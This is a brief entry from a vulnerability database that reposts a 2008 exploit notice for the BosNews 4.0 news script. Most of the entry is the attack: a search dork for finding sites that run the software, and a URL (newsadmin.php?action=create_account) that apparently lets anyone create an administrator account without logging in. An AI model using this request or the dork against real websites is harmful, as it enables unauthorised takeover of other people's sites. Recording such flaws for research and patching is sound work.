BosNews v4.0 Remote add user admin

2008-04-15T00:00:00
ID SECURITYVULNS:DOC:19664
Type securityvulns
Reporter Securityvulns
Modified 2008-04-15T00:00:00

Description


----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo


= Author : HouSSaMix
= Script : BosNews = version : 4.0 = Download : http://www.bosdev.com/

= Dork : Powered by BosNews

= BUG : Remote add user admin

exploit => Target.com/path/newsadmin.php?action=create_account

here u can add a new user admin

= admin login

Target.com/path/newsadmin.php